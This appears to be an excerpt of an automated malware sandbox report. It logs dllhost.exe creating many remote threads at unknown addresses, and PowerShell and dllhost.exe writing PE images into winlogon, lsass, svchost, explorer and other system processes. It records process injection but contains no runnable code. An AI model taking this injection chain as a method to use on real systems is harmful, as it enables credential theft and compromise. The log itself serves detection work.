Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2AF25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8925AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 12825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 10B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2CE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 20425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: D625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2CE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2DA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2CF25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 10C25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8C182EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BF652EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8F262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 91C92EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4E422EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7AD72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C5302EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C5612EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 63AD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 25DC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FC902EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4E102EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 98572EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: CFCF2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8D02EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 15D32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B1242EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 82CD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 61412EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: ADC42EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3CB25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 997D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 15E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27C25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2CC25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 10825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2AB25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2FE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2E825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2AF25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8925AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 12825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 10B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2CE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26B25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 22725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 20425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: D625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2F025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2CE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F525AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2DA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2CF25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 10C25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8725AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8C182EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BF652EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8F262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 91C92EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4E402EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A2462EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: CEB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A5972EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A59A2EBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 262F1EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2287A7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
